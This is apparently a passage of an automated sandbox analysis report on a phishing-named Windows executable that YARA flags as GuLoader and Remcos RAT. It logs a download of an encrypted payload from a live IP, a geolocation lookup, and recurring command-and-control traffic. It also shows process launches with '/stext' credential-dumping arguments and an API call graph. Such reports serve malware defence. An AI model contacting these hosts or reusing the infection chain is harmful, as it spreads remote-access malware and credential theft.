                                                                                                                                                                                                                                        Sep 27, 2024 16:46:09.565586090 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:09.930068970 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:10.930018902 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:12.913788080 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:16.881676912 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:24.786254883 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:38.620393991 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:38.622440100 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:38.803972006 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:40.595225096 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:08.626425982 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:08.627995014 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:08.808872938 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:38.636224985 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:38.638591051 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:47:38.820950985 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:08.660093069 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:08.661897898 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:08.862052917 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:38.661603928 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:38.664521933 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:48:38.846735954 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:08.681679964 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:08.684083939 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:08.860243082 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:38.806499958 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:38.867887020 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:38.883485079 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:49:39.058490992 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:08.811553955 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:08.882209063 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:09.057790995 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:38.817245007 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:50:38.819824934 CEST4973626000192.168.11.20102.165.14.28
Sep 27, 2024 16:50:39.003118992 CEST  26000  49736  102.165.14.28  192.168.11.20
Sep 27, 2024 16:51:08.820648909 CEST  26000  49736  102.165.14.28  192.168.11.20
Sep 27, 2024 16:51:08.821787119 CEST  49736  26000  192.168.11.20  102.165.14.28
Sep 27, 2024 16:51:09.003540993 CEST  26000  49736  102.165.14.28  192.168.11.20
Sep 27, 2024 16:51:38.826916933 CEST  26000  49736  102.165.14.28  192.168.11.20
Sep 27, 2024 16:51:38.828749895 CEST  49736  26000  192.168.11.20  102.165.14.28
Sep 27, 2024 16:51:39.010828972 CEST  26000  49736  102.165.14.28  192.168.11.20
Sep 27, 2024 16:52:08.839488983 CEST  26000  49736  102.165.14.28  192.168.11.20
Sep 27, 2024 16:52:08.841413975 CEST  49736  26000  192.168.11.20  102.165.14.28
Sep 27, 2024 16:52:09.021608114 CEST  26000  49736  102.165.14.28  192.168.11.20
Sep 27, 2024 16:52:38.845864058 CEST  26000  49736  102.165.14.28  192.168.11.20
Sep 27, 2024 16:52:38.846209049 CEST  49736  26000  192.168.11.20  102.165.14.28
Sep 27, 2024 16:52:39.030919075 CEST  26000  49736  102.165.14.28  192.168.11.20
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Sep 27, 2024 16:44:21.825634956 CEST  62826  53  192.168.11.20  1.1.1.1
Sep 27, 2024 16:44:21.937058926 CEST  53  62826  1.1.1.1  192.168.11.20

Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Sep 27, 2024 16:44:21.825634956 CEST  192.168.11.20  1.1.1.1  0xbbae  Standard query (0)  geoplugin.net  A (IP address)  IN (0x0001)  false

Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Sep 27, 2024 16:44:21.937058926 CEST  1.1.1.1  192.168.11.20  0xbbae  No error (0)  geoplugin.net  (none)  178.237.33.50  A (IP address)  IN (0x0001)  false

• 102.165.14.28
• geoplugin.net

Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.11.20  49735  102.165.14.28  80  5888  C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
Timestamp  Bytes transferred  Direction  Data
Sep 27, 2024 16:44:19.572277069 CEST  175  OUT  GET /dYaWuYrfJW197.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 102.165.14.28
Cache-Control: no-cache
Sep 27, 2024 16:44:19.723642111 CEST  1289  IN  HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Sep 2024 08:46:51 GMT
Accept-Ranges: bytes
ETag: "f6bcecbb910db1:0"
Server: Microsoft-IIS/10.0
Date: Fri, 27 Sep 2024 14:44:19 GMT
Content-Length: 494656
Data Raw: ed 09 9e 6a a3 fa bc a4 5b b3 4d af af 1e f3 76 da 01 f5 84 f1 a3 55 55 57 41 f6 5c d3 c1 45 0a e1 40 13 a9 a2 d0 17 7f da 89 86 23 30 d3 5b 47 48 a5 fb d4 f3 33 48 5f 65 bc f6 41 6a 20 9d 3a bc f8 45 ad 9c 86 43 b7 c1 64 dc 31 cb 10 3a 22 04 2b b6 bf ec e1 58 eb 15 f9 de cb d6 1a e7 57 04 07 a5 ce 81 d5 a7 ff 56 a0 0e ff 6e eb 8f 8a a9 a4 6e 26 7a f6 ef fd 89 80 e5 32 d7 4f b9 7a 79 92 db 4b 65 af c3 44 3b 79 23 81 d2 ab e9 00 b5 01 2d 6c e2 e3 fc b3 4d 6e d0 21 72 df 30 2f 22 3e 3b 9f 3a 87 3a aa 07 db 10 3e ed f8 b7 23 d4 a4 40 ef 0c ce 93 46 d3 c7 be f6 1d 0d 0a 8a 87 d2 3e 6a 9a 1a 66 65 de 59 d2 fb 1c f9 67 1a 79 ff 3c 01 e3 c8 63 02 f4 c9 2b d6 bc c1 28 c3 9e 42 87 98 69 fe bf 44 d5 83 e1 c2 db 84 ab 50 1e a1 fb e7 57 82 8a 8b fc 23 49 56 36 13 42 7e 28 a9 e1 be fd f6 8b 4c cc 67 be 47 1d 94 c5 67 28 b4 84 82 f9 48 ff 1c e3 4a cf fc 4f 2a 79 21 56 56 9a 30 e2 90 13 09 4c f3 ae 3e 23 68 f8 47 c9 3a 50 70 6d 13 60 15 c2 bc 5a 85 22 40 55 65 ed 78 4b ac 8c 54 60 93 fe 86 ad b8 3b 07 1b 23 63 5e [TRUNCATED]
Data Ascii: j[MvUUWA\E@#0[GH3H_eAj :ECd1:"+XWVnn&z2OzyKeD;y#-lMn!r0/">;::>#@F>jfeYgy<c+(BiDPW#IV6B~(LgGg(HJO*y!VV0L>#hG:Ppm`Z"@UexKT`;#c^mdP}fP9SU/`ZB2b:y'-lz!w~J5kj1)2d%LT;l$M&GSip_$[aZZ5n_x;jia0il4[=(80HRlv7.$[SJ|KcM_nN"nFhub.WHeAN^.6[mmh:!QQ@<,]aZ1H=,WJ$a8T*4dF/3=^A:wlgxVwQ)H`",V}_+,$`$_`oOyS6U!3{pFgp3.aI^`=Y,4n3MoPx]aX<[^k_F AI$&x,aeJ0gnIPdtSlzEef\7dmR@wDe24DX.s*V#9h,5^F&pK [TRUNCATED]
Sep 27, 2024 16:44:19.723656893 CEST  1289  IN  Data Raw: be eb a1 13 c7 9e 3e b6 41 fc ab 1b 01 11 00 2a 8f e7 38 d6 45 cc 16 4c 4c 39 ff 9a 83 0d ad 44 50 9b 07 a7 49 d5 50 5c 99 30 06 c0 f8 d1 43 01 3d d4 01 91 1e 6b ff a8 9c c6 8d e1 77 e9 52 57 de bb 43 19 8e f8 73 e4 1c f9 07 ac 4a 64 fa 23 8e d8
Data Ascii: >A*8ELL9DPIP\0C=kwRWCsJd#m4O\OgQNC>)*~RCKp5vBrY1nn#b;F2O5J6E^$rKvZYQ5&^DLm[*(9=j)>>h,(&
Sep 27, 2024 16:44:19.723669052 CEST  1289  IN  Data Raw: 39 e1 95 5e f8 e8 db be b9 43 d9 89 c9 09 9a 6e 1a c4 e0 38 c4 fb d8 d8 b3 e9 28 09 60 f2 e7 38 c2 39 50 55 0b 20 82 78 fe 87 bc fb fa 07 82 90 5a b4 66 64 33 94 97 74 dd 00 26 40 37 c6 46 37 09 db b0 b2 2d 0c 91 12 f0 f9 13 58 db 27 4a 19 ab 15
Data Ascii: 9^Cn8(`89PU xZfd3t&@7F7-X'J<RjVbwAH?wm{A|O5})_;C1;wi8Ll7Z63;mw$e6dcz-nRAF/?vQHJX^D)DqL
Sep 27, 2024 16:44:19.723680019 CEST  1289  IN  Data Raw: 64 72 bd 9a df 9e e2 72 9a cd 89 18 cc 6a a5 a0 cb f1 ab 09 80 ee 8e 63 e6 75 be 9b 30 b9 ab c5 b7 1c 45 45 87 bf 54 fd 28 06 12 ea dc 06 b5 d9 c8 6c cb a5 f0 c6 e9 87 87 d1 d4 47 d3 9b 11 bb 0e 57 f9 9e f3 b3 3c 11 e2 7f 9c 02 ad f1 5c 58 5c 00
Data Ascii: drrjcu0EET(lGW<\X\4,ga&0v+4v?vai5|l6^+l}qfRJj+DxIn`A:U1'b}GHeA[Gz>tk2Fm#6xLC~a"0ey)P
Sep 27, 2024 16:44:19.723690987 CEST  1289  IN  Data Raw: cb 04 b7 2d 0d de 31 34 85 3a 48 bc c3 15 cd ef e1 94 02 74 fa de cb bc 1a 8d 56 ec 47 a6 ce 81 16 f2 74 ba f1 5d 74 33 e3 d8 01 50 9f 95 52 20 9c ef 97 88 68 c2 31 cf 4e 32 b1 9f 6c 63 45 65 4b 41 46 f2 18 20 cd 1f da 55 6b cd 72 0d 45 c9 08 5b
Data Ascii: -14:HtVGt]t3PR h1N2lcEeKAF UkrE[U}:fZ~O?;_Ba|5SAVK?WB&@]wxYQb?o-X#9Sg`}2p]]`D#XlEWACO)q*j/}\=
Sep 27, 2024 16:44:19.723702908 CEST  1289  IN  Data Raw: f6 d9 9b 38 1e 70 3a b2 fd ad 5a 30 53 fb 91 7e 73 23 93 ec 5e 22 5b 71 dd f4 59 c9 88 70 18 87 c6 34 84 5f bc e4 5c 13 01 2d dc 23 11 1f cc cc 17 c8 ff 43 ff d3 d1 5c 1a b0 ef 0b e1 1b 75 76 36 e7 68 36 a1 46 08 1f 85 03 dd 37 2a ca 9e 0e e1 89
Data Ascii: 8p:Z0S~s#^"[qYp4_\-#C\uv6h6F7*jq~}|86'8_{HeFNtN8Zq t;CHRgKd$L45h|w,CJujvqq_z,IayC9T.?POF-zV;[b
Sep 27, 2024 16:44:19.723714113 CEST  1289  IN  Data Raw: 03 50 ad c5 de 7a 02 a4 d6 d4 ae 63 a6 b8 32 be eb 4a 21 47 e2 1a a6 41 88 b4 98 ff 01 73 30 04 28 d0 c5 bc 33 e9 c7 83 b2 ff a1 73 02 ef 82 00 f1 06 4f da 2f af a3 72 85 e7 7b ca db fd f6 fd 3c 11 f9 96 14 3f 5e 2b 24 2f 22 29 72 99 ee 4a ba fb
Data Ascii: Pzc2J!GAs0(3sO/r{<?^+$/")rJ6o;2BpDu%TrEFxvMaYNrI7bnpVI%Sfq1[bZUubWM,UQW$3}hcqC
Sep 27, 2024 16:44:19.723726034 CEST  1289  IN  Data Raw: ab e2 65 f9 91 f8 e6 79 a8 31 98 2a fb f0 c2 a4 2e ee 0e d8 c5 da a9 a1 59 d6 76 d5 ee 17 c3 9e c4 14 f4 44 3f 8d d9 d3 24 40 52 60 1a 18 5b 29 27 09 96 63 ae c1 39 fe 86 68 c9 f9 07 8a bb 2a 55 e7 21 6a be 74 46 37 2b 7f 83 8e ae cd da a3 39 41
Data Ascii: ey1*.YvD?$@R`[)'c9h*U!jtF7+9Ab(^Ym^frsXF}JkuK/|X]#p$Y*5zL=\aeFp)qUuNI\F%%5[%DWB7nKFA8\O *CSs;p^
Sep 27, 2024 16:44:19.723737001 CEST  1289  IN  Data Raw: da dd cc 86 c8 49 1b a0 89 08 3c f7 fb a5 ed 0d 77 bd 9a 2e c7 c4 25 72 65 69 1d cf 3f bc a8 84 a1 4c 64 dc f9 da ab cc 32 ee e9 60 29 b4 4e e7 7f 39 60 13 07 04 98 b2 f3 05 59 5f 3b e1 e2 04 a2 dc 08 fc 4d 26 e4 49 a1 5f a2 df d2 ce 53 ff 86 93
Data Ascii: I<w.%rei?Ld2`)N9`Y_;M&I_S+iavZ(XD;R.m9.8Vm7HHr87yX^j+$-h|::DI\bKejNr<kF]D0n**
Sep 27, 2024 16:44:19.723747969 CEST  1289  IN  Data Raw: 5a 03 a9 2d 10 1c ac 30 ea 7f 0e a1 91 89 83 d6 ab 69 18 9b 23 b2 f0 e3 b1 ec e9 c3 ac 4e 13 1e 07 60 93 a4 80 90 14 0a e7 dc ca ef f0 3e 7e 2a 6b ac 00 f7 64 ff e5 1a 67 a6 59 5b 91 ad 26 d2 f7 76 c5 a4 f1 61 27 50 49 85 88 72 15 61 79 90 86 ad
Data Ascii: Z-0i#N`>~*kdgY[&va'PIrayuB,ed>GZb5s'+aNwHP7A~[YO+~z:mGr,/WX:5#HZUma"1XA;9kp+oH$wf B9rVCED
Sep 27, 2024 16:44:19.859062910 CEST  1289  IN  Data Raw: 21 b1 f3 8b 10 21 c4 f5 f2 9d e5 47 8d d0 c0 d2 24 6d a9 c5 9b 69 9d fa 6f 59 f5 5a 43 39 72 8f 2e 6f d4 de 25 07 12 0d a7 68 76 5b 4b 60 28 1c 8f 9e 4a a7 e4 28 50 a5 76 fb 20 d2 69 5a 44 11 71 4c af 01 2c d1 7d d6 6e 80 3a d9 18 3e 52 12 6c 4e
Data Ascii: !!G$mioYZC9r.o%hv[K`(J(Pv iZDqL,}n:>RlNqLWFBjNY7U9Lsd+'wAAr:/yn^QZ"'M#8PEz7f8Vy9E+J^yVF


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.11.20  49737  178.237.33.50  80  5888  C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
Timestamp  Bytes transferred  Direction  Data
Sep 27, 2024 16:44:22.135325909 CEST  71  OUT  GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Sep 27, 2024 16:44:22.336378098 CEST  1171  IN  HTTP/1.1 200 OK
date: Fri, 27 Sep 2024 14:44:22 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 41 73 68 62 75 72 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 0a 20 20 22 67 65 [TRUNCATED]
Data Ascii: { "geoplugin_request":"79.127.132.20", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Ashburn", "geoplugin_region":"Virginia", "geoplugin_regionCode":"VA", "geoplugin_regionName":"Virginia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"39.0469", "geoplugin_longitude":"-77.4903", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



Target ID: 0
Start time: 10:43:56
Start date: 27/09/2024
Path: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
Imagebase: 0x400000
File size: 830'698 bytes
MD5 hash: 97249FEAAA2DD67AF540E7615533294C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2950982254.00000000055B5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 10:44:09
Start date: 27/09/2024
Path: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
Imagebase: 0x400000
File size: 830'698 bytes
MD5 hash: 97249FEAAA2DD67AF540E7615533294C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.7792890064.00000000025B5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:10:44:22
                                                                                                                                                                                                                                        Start date:27/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hvglntqjpwxqeafzzxxpsjflkurl"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:830'698 bytes
                                                                                                                                                                                                                                        MD5 hash:97249FEAAA2DD67AF540E7615533294C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:10:44:22
                                                                                                                                                                                                                                        Start date:27/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\sptdomaclepvggbdihsivorutbiuqfu"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:830'698 bytes
                                                                                                                                                                                                                                        MD5 hash:97249FEAAA2DD67AF540E7615533294C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:10:44:22
                                                                                                                                                                                                                                        Start date:27/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\cjzw"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:830'698 bytes
                                                                                                                                                                                                                                        MD5 hash:97249FEAAA2DD67AF540E7615533294C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true


Execution Graph

Execution Coverage: 27.5%
Dynamic/Decrypted Code Coverage: 30%
Signature Coverage: 21.1%
Total number of Nodes: 700
Total number of Limit Nodes: 17
GlobalAlloc 2771->2772 2771->2773 2772->2771 2773->2686 2777 1000265c 2774->2777 2775 100026c0 2778 100026c5 GlobalSize 2775->2778 2779 100026cf 2775->2779 2776 100026ad GlobalAlloc 2776->2779 2777->2775 2777->2776 2778->2779 2779->2709 2781 10002b62 2780->2781 2782 10002ba2 GlobalFree 2781->2782 2830 1000121b GlobalAlloc 2783->2830 2785 10002506 MultiByteToWideChar 2790 100024ae 2785->2790 2786 1000252b StringFromGUID2 2786->2790 2787 1000253c lstrcpynW 2787->2790 2788 1000254f wsprintfW 2788->2790 2789 1000256c GlobalFree 2789->2790 2790->2785 2790->2786 2790->2787 2790->2788 2790->2789 2791 100025a7 GlobalFree 2790->2791 2792 10001272 2 API calls 2790->2792 2831 100012e1 2790->2831 2791->2703 2792->2790 2835 1000121b GlobalAlloc 2794->2835 2796 100015ba 2797 100015c7 lstrcpyW 2796->2797 2799 100015e1 2796->2799 2801 100015fb 2797->2801 2800 100015e6 wsprintfW 2799->2800 2799->2801 2800->2801 2802 10001272 2801->2802 2803 100012b5 GlobalFree 2802->2803 2804 1000127b GlobalAlloc lstrcpynW 2802->2804 2803->2713 2804->2803 2806 10002475 2805->2806 2808 10001861 2805->2808 2807 10002491 GlobalFree 2806->2807 2806->2808 2807->2806 2808->2719 2808->2720 2810 10001272 2 API calls 2809->2810 2811 1000155e 2810->2811 2811->2714 2812->2724 2813->2750 2815 100015ad 2814->2815 2815->2747 2822 1000121b GlobalAlloc 2816->2822 2818 1000123b lstrcpynW 2818->2745 2819->2750 2820->2742 2821->2749 2822->2818 2824 100012c1 2823->2824 2825 1000122c 2 API calls 2824->2825 2826 100012df 2825->2826 2826->2755 2828 100025e2 VirtualAlloc 2827->2828 2829 10002638 2827->2829 2828->2829 2829->2763 2830->2790 2832 100012ea 2831->2832 2833 1000130c 2831->2833 2832->2833 2834 100012f0 lstrcpyW 2832->2834 2833->2790 2834->2833 2835->2796 2836 403d1b 2837 403d33 2836->2837 2838 403e6e 2836->2838 2837->2838 2839 403d3f 2837->2839 2840 403ebf 2838->2840 2841 403e7f GetDlgItem GetDlgItem 2838->2841 2843 403d4a SetWindowPos 2839->2843 2844 403d5d 2839->2844 2842 403f19 2840->2842 2853 401389 2 API 
calls 2840->2853 2845 4041f4 18 API calls 2841->2845 2847 404240 SendMessageW 2842->2847 2867 403e69 2842->2867 2843->2844 2848 403d62 ShowWindow 2844->2848 2849 403d7a 2844->2849 2846 403ea9 SetClassLongW 2845->2846 2850 40140b 2 API calls 2846->2850 2863 403f2b 2847->2863 2848->2849 2851 403d82 DestroyWindow 2849->2851 2852 403d9c 2849->2852 2850->2840 2906 40417d 2851->2906 2854 403da1 SetWindowLongW 2852->2854 2855 403db2 2852->2855 2856 403ef1 2853->2856 2854->2867 2858 403e5b 2855->2858 2859 403dbe GetDlgItem 2855->2859 2856->2842 2860 403ef5 SendMessageW 2856->2860 2857 40417f DestroyWindow EndDialog 2857->2906 2916 40425b 2858->2916 2864 403dd1 SendMessageW IsWindowEnabled 2859->2864 2869 403dee 2859->2869 2860->2867 2861 40140b 2 API calls 2861->2863 2862 4041ae ShowWindow 2862->2867 2863->2857 2863->2861 2866 406281 17 API calls 2863->2866 2863->2867 2872 4041f4 18 API calls 2863->2872 2897 4040bf DestroyWindow 2863->2897 2907 4041f4 2863->2907 2864->2867 2864->2869 2866->2863 2868 403df3 2913 4041cd 2868->2913 2869->2868 2870 403dfb 2869->2870 2873 403e42 SendMessageW 2869->2873 2874 403e0e 2869->2874 2870->2868 2870->2873 2872->2863 2873->2858 2876 403e16 2874->2876 2877 403e2b 2874->2877 2875 403e29 2875->2858 2879 40140b 2 API calls 2876->2879 2878 40140b 2 API calls 2877->2878 2880 403e32 2878->2880 2879->2868 2880->2858 2880->2868 2882 403fa6 GetDlgItem 2883 403fc3 ShowWindow KiUserCallbackDispatcher 2882->2883 2884 403fbb 2882->2884 2910 404216 KiUserCallbackDispatcher 2883->2910 2884->2883 2886 403fed EnableWindow 2891 404001 2886->2891 2887 404006 GetSystemMenu EnableMenuItem SendMessageW 2888 404036 SendMessageW 2887->2888 2887->2891 2888->2891 2890 403cfc 18 API calls 2890->2891 2891->2887 2891->2890 2911 404229 SendMessageW 2891->2911 2912 40625f lstrcpynW 2891->2912 2893 404065 lstrlenW 2894 406281 17 API calls 2893->2894 2895 40407b SetWindowTextW 2894->2895 2896 401389 2 API calls 2895->2896 2896->2863 2898 4040d9 CreateDialogParamW 
2897->2898 2897->2906 2899 40410c 2898->2899 2898->2906 2900 4041f4 18 API calls 2899->2900 2901 404117 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2900->2901 2902 401389 2 API calls 2901->2902 2903 40415d 2902->2903 2903->2867 2904 404165 ShowWindow 2903->2904 2905 404240 SendMessageW 2904->2905 2905->2906 2906->2862 2906->2867 2908 406281 17 API calls 2907->2908 2909 4041ff SetDlgItemTextW 2908->2909 2909->2882 2910->2886 2911->2891 2912->2893 2914 4041d4 2913->2914 2915 4041da SendMessageW 2913->2915 2914->2915 2915->2875 2917 404273 GetWindowLongW 2916->2917 2918 4042fc 2916->2918 2917->2918 2919 404284 2917->2919 2918->2867 2920 404293 GetSysColor 2919->2920 2921 404296 2919->2921 2920->2921 2922 4042a6 SetBkMode 2921->2922 2923 40429c SetTextColor 2921->2923 2924 4042c4 2922->2924 2925 4042be GetSysColor 2922->2925 2923->2922 2926 4042d5 2924->2926 2927 4042cb SetBkColor 2924->2927 2925->2924 2926->2918 2928 4042e8 DeleteObject 2926->2928 2929 4042ef CreateBrushIndirect 2926->2929 2927->2926 2928->2929 2929->2918 3010 1000103d 3011 1000101b 5 API calls 3010->3011 3012 10001056 3011->3012

Control-flow Graph

• Executed
• Not Executed
